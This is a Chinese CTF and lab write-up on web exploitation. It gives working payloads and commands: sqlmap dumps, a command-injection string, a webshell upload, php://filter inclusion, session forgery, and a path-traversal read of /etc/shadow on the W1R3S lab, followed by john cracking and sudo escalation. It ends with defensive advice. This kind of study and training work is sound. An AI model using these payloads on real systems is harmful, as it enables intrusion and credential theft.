中国十大管理咨询公司/搜索seo神器
写在前面
Copyright © [2023] [Myon⁶]. All rights reserved.
基于自己之前在CTF中Web方向的学习,总结出与Web相关的漏洞利用方法,主要包括:密码爆破、文件上传、SQL注入、PHP伪协议、反序列化漏洞、命令执行漏洞、文件包含漏洞、Vim文件泄露、HTTP协议、Cookie伪造、Git源码泄露,并就此总结出相关的防御应对措施。
原本是在W1R3S上进行了包括:信息收集、FTP渗透、Web渗透、John爆破、ssh远程登录、sudo提权等相关的渗透测试,但是考虑到内容太多,这里我主要总结从web渗透开始以及后续的测试,实质就是一个文件包含漏洞的利用。
本人CSDN博客地址:http://myon6.blog.csdn.net
期待大家的关注与支持!
目录
一、基本原理概述
1、Web漏洞利用
(1)SQL注入
(2)Git泄露与命令执行漏洞
(3)文件上传
(4)PHP伪协议与文件包含漏洞
(5)密码爆破
(6)Cookie伪造
(7)反序列化漏洞
(8)Vim文件泄露
(9)HTTP协议
2、基于W1R3S的渗透测试
(1)信息收集
(2)FTP渗透
(3)Web渗透
(4)John爆破
(5)ssh远程登录
(6)sudo提权
二、详细过程
1、Web漏洞利用
(1)SQL注入
(2)Git泄露与命令执行漏洞
(3)文件上传
(4)PHP伪协议与文件包含漏洞
(5)密码爆破
(6)Cookie伪造
(7)反序列化漏洞
(8)Vim文件泄露
(9)HTTP协议
2、基于W1R3S的Web渗透测试
三、结果分析
1、SQL注入
2、Git泄露与命令执行漏洞
3、文件上传
4、PHP伪协议与文件包含漏洞
5、密码爆破
6、Cookie伪造
7、反序列化漏洞
8、Vim文件泄露
9、HTTP协议
10、基于W1R3S的Web渗透测试
四、总结体会与防御措施
背景介绍
随着Web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这也使得越来越多的用户关注应用层的安全问题,对Web应用安全的关注度也逐渐升温。
一、基本原理概述
1、Web漏洞利用
(1)SQL注入
SQL注入是一种非常常见的数据库攻击手段,SQL注入漏洞也是网络世界中最普遍的漏洞之一,我们可以通过在表单中填写包含SQL关键字的数据来使数据库执行非常规代码。
(2)Git泄露与命令执行漏洞
开发人员使用 git 进行版本控制,如果配置不当,会将 .git 文件夹直接部署到线上环境,引起git 泄露漏洞,我们可以通过 .git文件恢复网站源码,来获取一些敏感信息。
(3)文件上传
由于web的过滤不够严格,导致在上传的位置上,用户可以上传一些带有脚本的文件,web端对脚本文件进行php解析,可以任意执行脚本文件。
(4)PHP伪协议与文件包含漏洞
PHP伪协议是PHP支持的协议与封装协议,我们可以使用它实现文件读取,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。
(5)密码爆破
密码爆破又叫暴力猜解,简单来说就是将密码逐个尝试, 直到找出真正的密码为止, 本质上是利用了穷举法。
(6)Cookie伪造
一个脆弱的站点或者web应用可能把存储敏感状态信息直接在cookies,在浏览器手动改cookie的名称和值再刷新页面可能足以获得提升的权限。
(7)反序列化漏洞
PHP反序列化漏洞也叫PHP对象注入,形成的原因是程序未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行、文件操作、执行数据库操作等参数不可控。
(8)Vim文件泄露
当开发人员在线上环境中使用vim编辑器,在使用过程中会留下vim编辑器缓存,当vim异常退出时,缓存会一直留在服务器上,引起网站源码泄露。
(9)HTTP协议
HTTP协议(超文本传输协议HyperText Transfer Protocol),它是基于TCP协议的应用层传输协议,简单来说就是客户端和服务端进行数据传输的一种规则。
2、基于W1R3S的渗透测试
w1r3s是一台存在着很多漏洞的靶机,可为我们提供相关的漏洞进行渗透测试。
(1)信息收集
信息收集就像一场战争中的“深入敌后”的一项“情报收集”任务。在开始渗透测试工作之前,我们通过要对目标使用各种工具进行信息收集工作,找出目标的漏洞和弱点,然后利用这些漏洞和弱点进行攻击,使得渗透任务得以顺利地完成。
(2)FTP渗透
FTP全名File Transfer Protocol,一种可以通过网络传输文件的协议,FTP协议是不安全的,不支持加密传输,它使用客户端到服务器这种类型,客户端启动后尝试对服务器发起连接请求,然后提供登录凭证,如果正确则开启会话。
(3)Web渗透
通过模拟恶意黑客的攻击方法,来评估Web站点安全的一种评估方法。常见的Web漏洞通常包括:输入输出验证不充分、设计缺陷、环境缺陷、sql注入、xss、csrf、目录穿越、文件上传、代码注入、命令注入、信息泄漏、暴力破解、越权漏洞、非授权对象引用、业务逻辑缺陷、框架漏洞、基础环境漏洞。
(4)John爆破
破解密码方式简单而粗暴,理论上只要时间上面允许,可以破译绝大多数用户密码,支持多种不同类型的系统架构,主要目的是破解不够牢固的Unix/Linux系统密码。
(5)ssh远程登录
SSH(Secure Shell )是一种安全通道协议,主要用来实现字符界面的远程的登录、远程复制等功能,SSH协议对通信双方的数据传输进行了加密处理,其中包括用户登录时输入的用户口令,因此SSH协议具有很好的安全性。
(6)sudo提权
是一种 Linux 命令,用于提升用户权限以执行特权操作,在执行sudo命令时,将普通用户的权限提升为root用户的权限,以便执行需要root权限的操作。
二、详细过程
1、Web漏洞利用
(1)SQL注入
这里我主要以sqlmap来演示,当然手工注入也是可以的。
(1)尝试列出所以数据库:
sqlmap -u "http://61.147.171.105:54285/?id=1" --dbs
(2)可以看到有一个名为cyber的数据库,我们指定列出它的表
sqlmap -u "http://61.147.171.105:54285/?id=1" -D cyber –tables
(3)这个数据库里只有一个表,且和数据库同名,我们继续列出指定表的字段
sqlmap -u "http://61.147.171.105:54285/?id=1" -D cyber -T cyber --columns
(4)尝试获取指定字段中的数据
sqlmap -u "http://61.147.171.105:54285/?id=1" -D cyber -T cyber -C pw --dump
(2)Git泄露与命令执行漏洞
(1)在About里发现网站是使用Git、PHP、Bootstrap搭建的
使用dirsearch扫一下
(2)从结果可以看出确实存在.git 目录,我们这里使用Githack来下载并恢复.git文件,切换到Githack所在位置,执行命令:python Githack.py url
(3)进入下载文件所在目录查看
打开flag.php,但是并没有看到什么
在index.php里发现有用代码
(4)代码审计
使用get请求方式给page传参,如果没传,默认page=home
(这也是为什么我们打开题目链接进去是在home页面)
$file会接收传入的$page并且在其前面拼接templates/,在其后面拼接.php
strpos() 函数会在'$file'这个字符串中进行查找,是否存在'..'
当字符串里有'..',则会返回一个数(即'..'第一次出现的位置),结果为true
与右边的false并不恒等,此时就会执行or右边的die()函数,输出 Detected hacking attempt!
file_exists() 函数还会检查我们传入的page拼接后是否存在
(5)构造payload
这里实际上是一个命令执行漏洞
我们可以直接在第一个assert()函数处就调用cat命令来获取flag
首先传入的page肯定不能有 '..',使strpos() 函数返回false,false和右边的false恒等
构造payload:?page=123') or system("cat templates/flag.php");//
在最后添加注释//,确保后面的代码不会执行
(3)文件上传
(1)在源码中找到默认登录账户和密码
(2)登陆成功后上传一句话木马
(3)这里没有任何的绕过,直接上蚁剑尝试连接
(4)PHP伪协议与文件包含漏洞
(1)打开题目链接,代码审计
file2被放入了file_get_contents() 函数,且要求返回值为 hello ctf
file1是要包含的文件,且flag应该是在文件flag.php里面
我们要想办法来读取这个文件,使用php://filter伪协议来读取源代码
即 file1=php://filter/read=convert.base64-encode/resource=flag.php
这里出现了file_get_contents()函数,想到用php://input来绕过
(2)构造payload
/?file1=php://filter/read=convert.base64-encode/resource=flag.php&file2=php://input,且post传入 hello ctf
(3)得到一串base64编码
PD9waHAKZWNobyAiV1JPTkcgV0FZISI7Ci8vICRmbGFnID0gY3liZXJwZWFjZXtjMjNkY2VlOWYxZTc0NTRlNzVlMTA5OGJlMmZhM2IzOH0=,解码即可得到PHP源码。
(5)密码爆破
(1)根据题目描述我们先试用御剑扫一下,发现存在shell后门,
(2)访问shell.ph,需要连接密码
(3)这里直接使用bp来爆破密码
抓包后发到Intruder 模块,并设置爆破的位置和用来爆破的字典
(4)开始攻击
爆破过程中,我们按长度排序,长度不一样的就是密码
至此,我们爆破出了密码是 hack
(6)Cookie伪造
题目要求只有管理员才能拿到flag
(1)在cookie里找到了一些东西
(2)通过查看发现web构架发现为flask,想到session伪造
(3)将cookie值进行base64解码
输出是json格式存储,还有一堆乱码,应该就是数据签名。
(4)使用Python脚本进行session伪造
根据前面base64解码得到session(json)格式,我们将name伪造为admin,并对session数据进行加密。
(5)将伪造的cookie传给session即可
(7)反序列化漏洞
(1)代码审计
这里出现了一个__wakeup()函数,在进行PHP反序列化时,会先调用这个函数,但是如果序列化字符串中表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup()的执行。
(2)脚本编写
<?php
class xctf{
public $flag = '111';
public function __wakeup(){
exit('bad requests');
}
}
$Myon = new xctf();
$Myon = serialize($Myon);
echo $Myon;
?>
(3)构造payload
上面输出的是O:4:"xctf":1:{s:4:"flag";s:3:"111";}
可以看到__wakeup()函数起作用了,我们需要将xctf的参值改为2(任何大于1的数),由于与反序列化规则不符,就会反序列化失败,从而绕过__wakeup()函数。
(8)Vim文件泄露
(1)访问.index.php.swp将文件下载下来,发到centos里
(2)使用vim -r index.php.swp恢复文件
(3)代码审计
给password传入"Give_Me_Your_Flag"且要先经过base64编码
就会输出Oh You got my password!并且调用system函数执行传入的cmd命令
(4)将字符串base64编码
(5) 构造payload
post:password=R2l2ZV9NZV9Zb3VyX0ZsYWc=&&cmd=cat /flag
(9)HTTP协议
使用bp抓包改包重发
(1)请求头写 x-forwarded-for: 127.0.0.1
换一种 client-ip: 127.0.0.1
(2)请求头写 referer: pornhub.com
(3)请求头写 user-agent: Chrome
(4)请求头写 via: Clash.win
拿到一个路径
2、基于W1R3S的Web渗透测试
(1)直接访问目标ip地址
查看靶机80端口的web服务,发现是个apache的主页
(2)使用dirsearch对目标主机80端口的web服务进行目录爆破
dirsearch -u 192.168.88.131
爆出两个可疑目录/administrator和/wordpress
(wordpress这个框架存在很多漏洞)
(3)使用whatweb命令查询,发现该网站的cms为Cuppa
(4)使用searchsploit命令查询Cuppa cms是否存在漏洞
searchsploit cuppa cms
(5)发现存在一处漏洞, 漏洞详情保存在25971.txt中, 将它导出来
searchsploit cuppa cms -m 25971.txt
(6)查看漏洞详情得知, 该cms可通过文件包含漏洞读取任意文件
(7)使用curl命令提交Post请求:
curl -X POST -d urlConfig=../../../../../../../../../etc/passwd http://192.168.88.131/administrator/alerts/alertConfigField.php
用同样的方法尝试读取shadow文件,该文件是用来存放用户名密码的
curl -X POST -d urlConfig=../../../../../../../../../etc/shadow http://192.168.88.131/administrator/alerts/alertConfigField.php
发现两处很明显的用户信息
分别对应着www-data用户:加密密码,w1r3s用户:加密密码
(8)使用john爆破
破解成功,得到:
用户 www-data 密码 www-data
用户 w1r3s 密码 computer
(9)ssh远程登录
远程登录成功
whoami 查看一下当前用户是谁
uname -a 查看系统状态
sudo -l 查看当前用户权限
可以看到当前用户具有所有权限
(10)sudo提权
因为w1r3s这个用户具有全权限,这里可以直接提权至root用户
sudo su
提权成功
切换到root根目录,直接找到flag
三、结果分析
1、SQL注入
拿到flag cyberpeace{818e277716501adc71a98b501c4d7a99}
总结一些sqlmap常用的参数:
-D 选择使用哪个数据库 -T 选择使用哪个表 -C 选择使用哪个列
--tables 列出当前的表 --columns 列出当前的列 --dump 获取字段中的数据
2、Git泄露与命令执行漏洞
传入page后查看源码,找到flag
cyberpeace{1f150d17210f2080d18800a5a99e9f9b}
3、文件上传
连接成功,并且在根目录下面找到
flag=NSSCTF{96cd0bd4-f5e6-4fbf-8b09-c38f244d4aa6}
4、PHP伪协议与文件包含漏洞
Base64解码后得到PHP源码
拿到 $flag = cyberpeace{c23dcee9f1e7454e75e1098be2fa3b38}
存在文件包含时使用PHP伪协议,可能遇到的文件包含函数:
1、include 2、require 3、include_once 4、require_once 5、highlight_file
6、show_source 7、flie 8、readfile 9、file_get_contents
10、file_put_contents 11、fopen
5、密码爆破
将密码修改成正确的密码后放包
查看页面响应,已经显示出flag
flag{0bd17d36fcc7c9771191be6e558833ec}
6、Cookie伪造
将伪造的cookie传给session后,便可使用伪造的admin身份拿到flag
NSSCTF{df845e3b-f834-405e-9a49-3f847c5341fe}
关于session的作用:
由于http协议是一个无状态的协议,也就是说同一个用户第一次请求和第二次请求是完全没有关系的,但是现在的网站基本上有登录使用的功能,这就要求必须实现有状态,而session机制实现的就是这个功能。用户第一次请求后,将产生的状态信息保存在session中,这时可以把session当做一个容器,它保存了正在使用的所有用户的状态信息;这段状态信息分配了一个唯一的标识符用来标识用户的身份,将其保存在响应对象的cookie中;当第二次请求时,解析cookie中的标识符,拿到标识符后去session找到对应的用户的信息。
7、反序列化漏洞
我们正确的payload为:?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}
传入后即可拿到flag
在php中与序列化相关的函数为:
serialize() 序列化 // 将一个类的实例(对象)序列化为字符串
unserialize() 反序列化 // 将已序列化的变量(字符串)变回原来 PHP的值
8、Vim文件泄露
Post传参后拿到flag
NSSCTF{b8776bdb-b398-4544-b006-72ee55c5a531}
使用 vim -r 来查看当前目录下的所有swp文件;也可以使用 vim -r filename 来恢复文件,这样上次意外退出没有保存的修改就会覆盖文件。
9、HTTP协议
访问拿到的路径
在源码里找到另一个路径,继续访问,拿到flag
NSSCTF{d295698b-50ae-47ed-8393-2463797931d3}
10、基于W1R3S的Web渗透测试
前期我们是需要先进行信息收集,确定靶机IP,以及对靶机进行端口扫描,确定开放的端口和服务,探测出可能存在的漏洞,这对我们进行后续的渗透具有极其重要的作用。
从最初不知道登录密码
到最后彻底拿下整台靶机
四、总结体会与防御措施
从上面的Web漏洞利用中我们可以看到:Web安全漏洞的危害之大,而且无处不在,只要稍不注意就有可能导致个人信息的泄露。在Internet大众化及Web技术飞速演变的今天,在线安全所面临的挑战日益严峻,伴随着在线信息和服务的可用性的提升,以及基于Web的攻击和破坏的增长,安全风险达到了前所未有的高度。上面的CTF赛题大多其取材于真实环境渗透,只说一句话:开发和安全缺一不可!
1、针对注入漏洞,我们通常可以通过适当、及时地检查与清理用户的输入,来防范此类威胁,严格限制web应用的数据库的操作权限,给用户提供仅能满足需求的最低权限,从而最大限度的减少注入攻击对数据库的危害。
2、针对身份验证相关的漏洞,我们可以通过实施健全的会话管理控制、多因素身份验证、限制和监视失败的登录尝试,避免使用默认密码,进行弱密码检查,使用服务端,安全,内置的会话管理,确保对于每次登录生成随机会话ID,会话ID不应该在URL中,且应该及时销毁。
3、针对敏感数据泄漏,我们可以对系统处理、存储或传输的数据分类,并根据分类进行访问控制,对于没必要存放的、重要的敏感数据,应当尽快清除,或者通过PCI DSS标记或拦截。未存储的数据不能被窃取。
4、针对受损的访问控制带来的未经授权的信息泄露、数据被直接修改或破坏,我们可以通对前后端同时对用户输入信息进行校验,双重验证机制,执行关键操作前必须验证用户身份,验证用户是否具备操作数据的权限。
5、针对不安全的反序列化漏洞,我们需要对任何序列化对象进行完整性检测,比如数字签名以防止数据篡改或恶意对象,限制或监管入的和出的来自反序列化的容器或服务器的网络链接。
6、针对任意文件上传和读取下载,我们通过设置白名单,即只能下载/访问某个目录下的文件,权限给到最低,正则严格判断用户输入参数的格式,php.ini配置open_basedir限定文件访问范围。
注:Copyright © [2023] [Myon⁶]. All rights reserved.
相关文章:

基于CTF探讨Web漏洞的利用与防范
写在前面 Copyright © [2023] [Myon⁶]. All rights reserved. 基于自己之前在CTF中Web方向的学习,总结出与Web相关的漏洞利用方法,主要包括:密码爆破、文件上传、SQL注入、PHP伪协议、反序列化漏洞、命令执行漏洞、文件包含漏洞、Vim…...

Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现
Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现 漏洞名称影响版本影响版本 漏洞复现环境搭建漏洞利用 总结 漏洞名称 影响版本 Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式…...

海康威视IP网络对讲广播系统命令执行漏洞(CVE-2023-6895)
漏洞介绍 海康威视IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。 Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/ph…...

IDE:DevEco Studio
简介 DevEco Studio是华为为开发者提供的一款集成开发环境(IDE),主要用于开发鸿蒙操作系统(HarmonyOS)的应用程序。作为一款全场景分布式开发工具,DevEco Studio支持多端开发、调试和模拟,为开…...

【QT】C++/Qt使用Qt自带工具windeployqt打包
基本操作 运行项目debug或者release 将运行后的可执行文件单独放到一个文件夹中 根据项目使用的kits来选择Qt的打包工具 打开工具后移动到exe文件夹下执行windeployqt xxx.exe 预览图 问题 打包后再其他电脑上运行出现下图错误 将自己电脑的这个文件拷到可执行文件夹中既…...

Ubuntu系统的基础操作和使用
文章目录 系统安装系统界面文件系统包管理命令行常见问题 Ubuntu是一个基于Debian的Linux发行版,以桌面应用为主。它是自由软件,意味着你可以自由地使用、复制、研究、修改和改进这个软件。下面我们将详细介绍Ubuntu系统的基础操作和使用。 系统安装 U…...

harmonyOS 自定义组件基础演示讲解
上文 HarmonyOS组件属性控制 链式编程格式推荐我们讲了一些系统组件 可以传入一些事件和参数 来达到一些不同的效果 其实 我们还可以用自己写的组件 那么 组件这么写? 其实 我们的 page 内部结果 就是一个组件 harmonyOS的概念 万物皆组件 那么 我们就可以在他下面…...

我的创作纪念日——成为创作者第1024天
机缘 一、前言 早上收到CSDN的推送信息,今天是我成为创作者的第1024天,回想起自己已经好久没有写博客了,突然间很有感触,想水一篇文章,跟小伙伴们分享一下我的经历。 二、自我介绍 我出生在广东潮汕地区的一个小城…...

正点原子驱动开发BUG(一)--SPI无法正常通信
目录 一、问题描述二、讲该问题的解决方案三、imx6ull的spi适配器驱动程序控制片选分析3.1 设备icm20608的驱动程序分析3.2 imx的spi适配器的驱动程序分析 四、BUG修复测试五、其他问题 一、问题描述 使用正点的im6ull开发板进行spi通信驱动开发实验的时候,主机无法…...

SpringBoot接入轻量级分布式日志框架GrayLog
1.前言 日志在我们日常开发定位错误,链路错误排查时必不可少,如果我们只有一个服务,我们可以只简单的通过打印的日志文件进行排查定位就可以,但是在分布式服务环境下,多个环境的日志统一收集、展示则成为一个问题。目…...

光电器件:感知光与电的桥梁
光电器件是电子工程领域的一个重要分支,主要研究光与电之间的相互转换。这些器件在许多领域都有广泛的应用,如通信、生物医学、军事等。 光电器件主要包括光电二极管、光电晶体管、光电倍增管等。这些器件的工作原理都是基于光电效应,即光子…...

Ceph入门到精通-smartctl 查看硬盘参数
smartctl 参数含义 Model Family: Toshiba s... Enterprise Capacity HDD Device Model: TOSHIBA MG08ACss Serial Number: sssssss LU WWN Device Id: 5 ss ss Firmware Version: 4303 User Capacity: 16,000,900,661,248 bytes [16.0 TB] Sector Sizes: 51…...

Module build failed: TypeError: this.getOptions is not a function
在使用webpack打包出现以上错误时,可能是你安装的css-loader和style-loader的版本过高。 我用的webpack版本是3.6.0 因此需要降低一下版本 在你编辑器终端输入以下命令: npm install css-loader3.6.0 npm install --save-dev style-loader1.00 然后接下…...

蓝牙电子价签芯片OM6626/OM628超低功耗替代NRF52832
电子价签应用简介 在全球零售业受到电商冲击、劳动力成本和周转率上升、消费者需求改变的行业背景下,电子价签、AI货架监控系统、自助结账设备、相关的方案将零售行业的发展带上智能化数字化的发展道路上。为企业与客户带来的更高效更便捷的消费体验。 蓝牙电子价…...

ELK(八)—Metricbeat部署
目录 介绍修改配置文件启动 Modulenginx开启状态查询配置Nginx module查看是否配置成功 介绍 Metricbeat 是一个轻量级的开源度量数据收集器,用于监控系统和服务。它由 Elastic 公司开发,并作为 Elastic Stack(Elasticsearch、Logstash、Kiba…...

Ansible自动化运维以及模块使用
ansible的作用: 远程操作主机功能 自动化运维(playbook剧本基于yaml格式书写) ansible是基于python开发的配置管理和应用部署工具。在自动化运维中,现在是异军突起 ansible能够批量配置、部署、管理上千台主机。类似于Xshell的一键输入工具。不需要每…...

数据分析场景下,企业大模型选型的思路与建议
来源/作者:爱分析 随着大模型带来能力突破,让AI与数据分析相互结合,使分析结果更好支撑业务,促进企业内部数据价值释放,成为了当下企业用户尤为关注的话题。本次分享主要围绕数据分析场景下大模型底座的选型思路&#…...

Mongodb复制集架构
目录 复制集架构 复制集优点 复制集模式 复制集搭建 复制集常用命令 复制集增删节点 复制集选举 复制集同步 oplog分析 什么是oplog 查看oplog oplog大小 复制集架构 复制集优点 数据复制: 数据在Primary节点上进行写入,然后异步地复制到Secondary节点&a…...

云原生之深入解析Kubernetes集群发生网络异常时如何排查
一、Pod 网络异常 网络不可达,主要现象为 ping 不通,其可能原因为: 源端和目的端防火墙(iptables, selinux)限制; 网络路由配置不正确; 源端和目的端的系统负载过高,网络连接数满…...

error: C2039: “qt_metacast“: 不是 “***“ 的成员
报错信息: error C2039: "qt_metacast": 不是 "radartrack::Base_track_data" 的成员 最近在使用Qt开发,自定义的数据类在继承数据抽象类和QObject类时总是报“qt_metacast 不是不是 "radartrack::Base_track_data" 的成员…...

量子计算:开启IT领域的新时代
量子计算:开启IT领域的新时代 一、量子计算的基本原理与背景 量子计算作为一项前沿高级技术,正逐渐引起IT领域的广泛关注。传统计算机是通过二进制位(0和1)来储存和处理信息,而量子计算机则利用量子位或称为“量子比特…...

数据可视化---柱状图
类别内容导航机器学习机器学习算法应用场景与评价指标机器学习算法—分类机器学习算法—回归机器学习算法—聚类机器学习算法—异常检测机器学习算法—时间序列数据可视化数据可视化—折线图数据可视化—箱线图数据可视化—柱状图数据可视化—饼图、环形图、雷达图统计学检验箱…...

第十七章 爬虫scrapy登录与中间件2
文章目录 数据盘区太快会报错,setting中配置延迟 连接提取器...

运维知识点-Kubernetes_K8s
Kubernetes RBAC配置不当攻击场景攻击过程 RBAC配置不当 Service Account本质是服务账号,是Pod连接K8s集群的凭证。 在默认情况下,系统会为创建的Pod提供一个默认的Service Account, 用户也可以自定义Service Account,与Service…...

某电子文档安全管理系统存在任意用户登录漏洞
漏洞简介 某电子文档安全管理系统存在任意用户登录漏洞,攻击者可以通过用户名获取对应的cookie,登录后台。 资产测绘 Hunter语法:web.icon“9fd216c3e694850445607451fe3b3568” 漏洞复现 获取Cookie POST /CDGServer3/LinkFilterServi…...

音视频参数介绍
一、视频参数概念 单个视频帧:可以简单地理解成为一张图片 单个视频帧主要的参数概念: 分辨率: 分辨率是指图像或显示器上像素的数量,通常用横向像素数乘以纵向像素数表示。例如,1920x1080 表示宽度为1920像素&…...

vue中使用minio上传文件
创建一个 文件getOssClient import { getOssSetting } from "/api/common"; import Vue from "vue"; import { getCookies, getLocal } from "/utils/auth"; // get token from cookie export async function getStsToken() {//从后台获取stsTo…...

MySQL表的增删改查(初阶)
CRUD 即增加(Create)、查询(Retrieve)、更新(Update)、删除(Delete)四个单词的首字母缩写。且增删改查(CRUD,create,retrieve,update,delete)数据库的核心模块。 1. 新增(Create) 实…...

搜维尔科技:关于“第九届元宇宙数字人设计大赛”线上+线下巡回宣讲本周高校行程通告!
为了让大家更全面地了解此次大赛,顺利地进行大赛的报名和参赛,组委会遴选了一批优秀讲师代表,组建了宣讲团,以线上线下的方式陆续开展巡回宣讲。宣讲兼顾不同学生群体的需求,结合在数字人设计制作的过程中常见的疑难点…...

Gemini 1.0:Google推出的全新AI模型,改变生成式人工智能领域的游戏规则!
Gemini 1.0:Google推出的全新AI模型,将改变生成式人工智能领域的游戏规则! 🎥 屿小夏 : 个人主页 🔥个人专栏 : IT杂谈 🌄 莫道桑榆晚,为霞尚满天! 文章目录 …...